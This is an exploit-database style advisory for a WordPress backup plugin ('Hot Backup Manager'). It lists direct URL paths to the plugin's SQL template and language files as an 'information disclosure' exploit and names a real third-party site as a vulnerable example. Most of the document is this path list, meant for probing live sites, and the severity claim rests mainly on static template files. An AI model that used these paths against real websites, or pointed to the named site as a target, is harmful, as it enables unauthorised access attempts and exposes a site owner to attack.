#################################################################################################
# Exploit Title : WordPress Hot Backup Manager Plugins BackupManager Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage and Owner of the Script : Eugene Manuilov ~ wordpress.org ~ github.com/eugene-manuilov
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/pgsql.sql
/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/sqlite3.sql
/wp-content/plugins/BackupManager/templates/sql/dump-footer.sql
/wp-content/plugins/BackupManager/templates/sql/dump-header.sql
/wp-content/plugins/BackupManager/templates/sql/function.sql
/wp-content/plugins/BackupManager/templates/sql/insert-after.sql
/wp-content/plugins/BackupManager/templates/sql/insert-before.sql
/wp-content/plugins/BackupManager/templates/sql/procedure.sql
/wp-content/plugins/BackupManager/templates/sql/table.sql
/wp-content/plugins/BackupManager/templates/sql/trigger.sql
/wp-content/plugins/BackupManager/templates/sql/view.sql
/wp-content/plugins/BackupManager/languages/hotbackup-en_US.mo
#################################################################################################
# Example Vulnerable Site =>
[+] okanmarin.com.tr/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################